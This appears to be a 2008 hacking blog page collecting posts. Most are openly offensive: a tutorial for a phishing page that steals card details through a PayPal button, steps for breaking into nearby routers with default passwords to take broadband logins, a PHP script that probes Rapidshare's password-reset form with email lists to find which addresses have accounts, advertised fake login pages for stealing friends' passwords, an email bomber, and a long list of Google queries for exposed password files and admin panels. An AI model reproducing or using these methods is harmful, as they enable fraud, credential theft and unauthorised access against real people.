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Thursday, September 25, 2008

Rapidshare Solution Hack 2008 Edition

Rapidshare And Megaupload Search Plugin Maker
Rapidshare Anti Leech Decrypter 4.0
Rapidmule Rapidshare Downloader
BrutalDown Rapidshare Tips And Hints
Rapidshare/Megaupload Speeder
Rapidshare-The Way You Like It
Rapidshare Account Generator
Rapidshare Leeching ******s
Unlimited Rapidshare With IE
Premium Account Checker
Rapidshare Links Decoder
Renew IP - Gigaset SE105
Rapidshare Time Resetter
RapidLeecher v4.5 Beta
Mac Rapid1.6a Beta11
Premium Accounts 115
RapidLeecher v4.4.87
Rapidshare Checker
Briefcase Leecha 1.83
Rapidshare Decoder
USDownloader 1.3.3
Get Rapidshare 6.0
Rapget v0.96 Beta
The Grabber v1.4.1
Link Grabber v3.1.4
MegaLeecher 1.0.4
Rapidget v1.0
RapidUp v1.1

Hacking Credit Cards, Full Tutorial

Lets see Here is a tutorial how to Hack CC ........... You Can Say it Phising I call it Mind's work so Lets Start .........

Open Your PayPal account >>.

Go to Mechant Tools there is a section to Create Buttons for your
Website as Donate button shoping Cart ........... when u click on more
options you will Find Setting up a Buy Now Button...........

Wat are you waiting Get the Html Code For Buy Button it will look like


We will edit this Part Later :

Now its time to make Phisher to Grab CC

save the below Text page as html Page, after editing the reqd Parts and then upload it to free hosting server .......


You just have to edit INFO in this Line


Find This Line and edit

After editing save it as Pay.html and Upload it to any free html host

Now your Uploading Link suppose its


Now Go Back To above Buy Code which u get from Paypal and Replace this
Link from Paypal's


Now apply that code anywhere in Html when Victim Clicks on Buy Now he
will get directed towards your fake page when he puts his info and
clicks agree and continue . His Details will be Mailed to u on the id u
Provided .........

One main thing y Victim input his info .......

Go man and provide them a Years RS account for just 10$ he will die to buy that and u enjoy his details lols

Its easy isnt ?

Hack and enjoy tongue.gif

Hack Your Broadband!!No Risk!

Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)

Step 2: First Get your ip from
Asume your IP to be 59.x.x.17

Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range
start:59.x.x.1 to End:59.x.x.255

Step 4: Then check in your scanner which alive IPs has the port 80 open

Step 5: Enter that alive IP in your web browser

Step 6: It asks for user , pass
Type u
Password=admin or password
It is the default password for most of the routers.

if denied then use on another alive IP

Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.

Step 8: use ShowPassword or Revelation software to view the password in asterisks

Now You have Username/Password

Hack And Download Unlimited Songs

There r some websites like or that allow u to listen songs online but they dont allow u to download them. but now u can download any song from this website and make ur song's collection awesome. INTERNET DOWNLOAD MANAGER from this website::

install it and u r done...!!

just go to or and select the song that u want to play. 's popup window for playing song will come. dont do anything with that. within 2-3 seconds, ur INTERNET DOWNLOAD MANAGER'S window will pop-up and it will ask u for the location where u want to store this song on ur hard disk. click on START DOWNLOAD and u have that song in ur computer.

Google Talk Tricks

Few tricks to enhance your chat experience with Google Talk messenger
Send Bold Text: Text embedded between two * characters is displayed as bold text. Example: This is a *bold* statement

Send Italics Text: Text embedded between two _(underscore) characters is displayed as italics text. Example: This is an _italics_ statement

Insert Line Breaks: If you want to have a message that spans multiple paragraphs, just hold shift and hit enter

Send mail: Press F9 to send a mail to the contact with whom you are chatting

Restore Google Talk Window: Press Windows Key + Esc to restore Google Talk window from system tray

Call a Contact: Press F11 to start a voice call with the chat contact and F12 to end the voice call

Login to Multiple Google Talk Accounts Simultaneously

You can login to multiple Google Talk accounts simultaneously with a very easy hack.

Follow these steps

Create a shortcut of Google Talk messenger on your desktop or any other preferred location .

(To create a shortcut, right click on your Google Talk messenger application and select Send To-->Desktop(create shortcut) )

Right click on the Google Talk messenger icon and select Properties option

Modify target location text "c:\program files\google\google talk\googletalk.exe" /startmenu to

"c:\program files\google\google talk\googletalk.exe" /nomutex

Click Ok

Google-Movie Search Script


Google Hacking Tricks

Everyone Wanna To Learn How To Hack The Google..But i Will Give U 100 Tricks About Google...Plz Download It Here...

Email Killer (Email Bomber)

Email Killer (Email Bomber) - Shaify Mehta

Find who is Invisible on Yahoo messenger

Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline,they may in the 'Invisible' mode.This maybe if they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check.The chat window will open obviously.

Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities

1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below

Find who is Invisible on Yahoo messenger - Shaify Mehta

2. If the user is online (but in invisible mode), after few seconds {It can take up to one minute, depending on your connection speed}, you should get a blank page like in the picture below.So you know that the user is online.

Find who is Invisible on Yahoo messenger - Shaify Mehta

Get your email@anything you want

its true exemples

and more...

GO to :

then choose
Yes, use my e-mail address
click continue

Extracting Username And Pass from Rapidshare server


$browserData = array();
$browserData[CURLOPT_USERAGENT] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv: Gecko/20071025 Firefox/";
$browserData[CURLOPT_FOLLOWLOCATION] = true;
$browserData[CURLOPT_COOKIESESSION] = true;
$browserData[CURLOPT_COOKIEFILE] = "cookie";
$browserData[CURLOPT_COOKIEJAR] = "cookie";

function curlInit($link,&$browserData,$ssh = false)
$ch = curl_init($link);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, !$ssh);
curl_setopt_array ($ch,$browserData);

return $ch;
function array2postFields($data)
$data = (array) $data;

$postData = "";
foreach($data as $name => $value)
$postData .= $name . "=" . $value . "&";
$postData = substr($postData,0,-1);

return $postData;

class rapidshare
function __construct(&$browserData)
$this->browserData = &$browserData;
$this->link = "";

function requestpassword($username)
$ch = curlInit($this->link,$this->browserData,false);

$data = array("email"=>$username);

curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,array2postFields($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$responseText = curl_exec($ch);

return $responseText;


function translateResponse($responseText)
$responseRegexs = array(
"noaccounts" => "No accounts found. Please try again",
"valid" => "accounts and sent the data to your e-mail address",
"invalid" => "E-Mail address invalid!",
"ipblocked" => "Too many password requests from your IP-Address! Please try again in one hour"
foreach($responseRegexs as $name => $value)
if (preg_match('%' . $value . '%', $responseText))
return $name;
return false;
function testUser(&$user)
$responseText = $this->requestpassword($user["username"]);

$response = $this->translateResponse($responseText);

if($response == "ipblocked" || !$response)
echo "IP BLOCKED. Next try in seconds. Leave the window opened for autorefresh, or change your ip";
$waitingTime = 3610;

waitingTime = $waitingTime;
function showClock()
clockHolder = document.getElementById("clock");
clockHolder.innerHTML = waitingTime--;

echo $clockScript;

echo "";
return false;
$user["response"] = $response;
return true;


$_SESSION = array();

$users = &$_SESSION["users"];
$info = &$_SESSION["info"];

function validUsername(&$username)
$username = strtolower($username);
return preg_match('/\A[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,4}\Z/',$username);
$users = array();
$lines = explode("\n",$_POST["users"]);
foreach($lines as $line)
if (get_magic_quotes_gpc())
$line = stripslashes($line);

$username = trim($line);

$users[] = array(
"username" => $username,
"response" => false

$info["nUsers"] = count($users);
$info["currentUser"] = 0;

$_POST = array();
$_SESSION = array();

Give me some list of emails
You can freely refresh the window


$rapidshare = new rapidshare($browserData);

$exec = $_GET["exec"];

for($n = $info["currentUser"]; $n < $info["nUsers"]; $n++)
if ($rapidshare->testUser($users[$n]))

echo "Tested: " . $info["currentUser"] . " users


for($n = 0; $n < $info["currentUser"]; $n++)
$user = $users[$n];
printf("Username: %s - ",$user["username"]);

case "invalid":
echo "doesn't work. invalid";
case "noaccounts":
echo "doesn't work";
case "valid":
echo "[b]just WORKS![/b]";
echo ".unable to test. Contact the author";
echo "
echo "[url="?exec"]EXEC[/url]";



Fake Login Pages

Fake login pages that look just like major Email companies. Trick your friends to login and steal their passwords!
5 Fake pages/Admin panel !

Download Link:

# NO HTML understading needed,
# 100% Working { TESTED }
# Sends the victim to the Yahoo`s orignal website after submitting info without displaying any third party page or ads.
# All you have to do is to send the link of your page. (You wont need to edit any html, just upload file to your host)

Go to a site like register yourself there they will provide u with a Website Hosting.
After you have been registered go to Ur 110mb Control Panel, in that file Manager in that there will be a button to upload files.
Upload both the HTML Files and then if the File name was http://yoursitenamehere.110mb./login.html or any thing but when u type your domain in the Web Browser just type your Dpmain/thefilename.html open it ..
The Jobs DONE.
If u want to shorten the Domain just go to and find your self a Domain and link this Domain to the LOGIN page

Be a member on any invite only torrent tracker

This is the scenario: You search for your favorite game.You find it on torrent only prive site. You try to register and you can't because maximum users limit have been reached and you can only be a member by invite.
Here is a tutorial how to bypass this Wink

You need firefox first.
Now you need two plugins for Firefox, the
Check4Change and the AutoFormer

This guide tried on two trackers, blackcat games and another tracker.
Blackcats-Games is the best dedicated games torrent tracker out there. It tracks several thousand windows and console games. Obviously, it is not easy to get into and the tracker had signups closed for a long time and later the admins decided to close the invite based signups too. Now here is the good news; although you may not notice it, the Blackcats-Games is accepting new signups. You just have to be there at the right time.
You can try on any tracker you want, or try on any other site.I don't know if this method works on anything else.

Please note, you must provide your real (from your ISP) email. Blackcats will not accept popular free email addresses. If you have an ISP provided address, use it. If you don't, mail seems to work fine.

Okey, go to
blackcat games and hit on signup.
Normally you will receive this messange:

Be a member on any invite only torrent tracker - Shaify Mehta

Now highlight the message and right click on it. Select check4change and then custom.

Be a member on any invite only torrent tracker - Shaify Mehta

Enter 3 seconds in the "Refresh and check every.." field under "Check Interval". Also tick "Dont refresh while viewing page" button. We need the last check to avoid reload the page when you are on reg form.

Now, go to another tab and let the plugin do its job. Note, you must have the tracker's tab into backgroung, or else check4change will not reload the page.

Check4Change will now refresh the page every 3 seconds to detect any changes. Within 10 mins it will detect the signup form being loaded and notify you. Now take your time and fill each and every field (Except the captcha) carefully. Double check everything and make sure you tick everything.

Before you click submit, Go to FireFox Edit menu-->Autoformer--> click "save all fields". Now press submit. You will be greeted with "Max user limit reached' message again. Do not worry this is normal if you bypass the 30sec limit Blackcats' has.
If you can write fast, you don't need the autoformer step. I registered without it. So, some users may need time to fill the register form.

Be a member on any invite only torrent tracker - Shaify Mehta

Be a member on any invite only torrent tracker - Shaify Mehta

Be a member on any invite only torrent tracker - Shaify Mehta

All Google Hacking Keywords

It's not so hard, you just type 1 of these lines into the search bar at Then you'll get several links with secret information about different hompages, for example: admin passwords for ftps, ventrilo servers etc.

"admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg
"parent directory" +proftpdpasswd
Duclassified" "DUware All Rights reserved"
Elite Forum Version *.*"
Link Department"
"sets mode: +k"
"your password is" filetype:log
allinurl: admin mdb
eggdrop filetype:user user
enable password | secret "current configuration" -intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version= password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:”WINVNC3”
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
Web Wiz Journal"
intitle:"index of"
intitle:"index of"
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp)
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified
mysql history files
NickServ registration passwords
passlist.txt (a better way)
passwd / etc (reliable)
psyBNC config files
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:"remote assessment" OpenAanval Console "resistance is obsolete" "Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID"
"intitle:3300 Integrated Communications Platform" inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"Please authenticate yourself to get access to the management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
CuteNews" "2003..2005 CutePHP"
DWMail" password intitle:dwmail
Merak Mail Server Software"
Midmart Messageboard" "Administrator Login"
Monster Top List" MTL numrange:200-
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail Development Team"
"SysCP - login"
"This is a restricted Access Server" "Javascript Not Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an administrator then please"
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Web-Based Management" "Please input password to login"
"WebExplorer Server - Login" "Welcome to WebExplorer Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our website. Please authenticate yourself to continue."
"You have requested to access the management functions"
(intitle:"Please login - Forums
UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums
(intitle:"rymo Login")|(intext:"Welcome to rymo") -family
(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
ext:cgi intitle:"control panel" "enter your owner password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server CA"
filetype:r2w r2w
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login"
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums -" inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration"
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"oMail-admin Administration - Login"
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -script
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration"
intitle:"php icalendar administration"
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please activate JavaScript!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *"
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") web-access
intitle:endymion.sak? | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail "
intitle:ilohamail intext:"Version 0.8.10" "
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:Ovislink inurl:private/login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"default/login.php" intitle:"kerio"
inurl:"typo3/index.php?u=" -demo
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp
inurl:/Merchant2/ | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login"
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:"Microsoft Software Update Services"
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere
inurl::2082/frontend -demo
inurl:administrator "welcome to mambo" | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:default.asp intitle:"WebCommander"
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.php "SquirrelMail version"
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:webmail./ "Interface"
inurl:webvpn.html "login" "Please enter your"
Login ("
Jetbox One CMS ™" | "
Jetstream ? *")
Novell NetWare intext:"netware management portal version"
Outlook Web Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
Please enter a valid password! inurl:polladmin

Ultima Online loginservers
W-Nailer Upload Area
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" inurl:(PDF | DOC)
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"MacHTTP" filetype:log inurl:machttp.log
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
"Most Submitted Forms and Scripts" "this section"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"not for public release"
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
(intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")
(intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -edu -software -rob
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
+":8080" +":3128" +":80" filetype:txt
+"HSTSNR" -"" -"The PHP Group" inurl:source inurl:url ext:pHp
AIM buddy lists
contacts ext:wml
data filetype:mdb -site:gov -site:mil
exported email addresses
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ics ics
ext:ini intext:env.ini
ext:jbf jbf
ext:ldif ldif
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar
filetype:pot inurl:john.pot
filetype:PS ps
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please...
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:"admin panel" +"
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project"
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"curriculum vitae" filetype:doc
intitle:"edna:streaming mp3 server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Joomla - Web Installer"
intitle:"LOGREP - Log file reporting system"
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/" -script
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:email filetype:mdb
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:odbc.ini ext:ini -cvs
inurl:php.ini filetype:ini
inurl:preferences.ini "[emule]"
inurl:profiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:ssl.conf filetype:conf
inurl:vbstats.php "page generated"
inurl:wp-mail.php + "There doesn't seem to be any new mail."
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
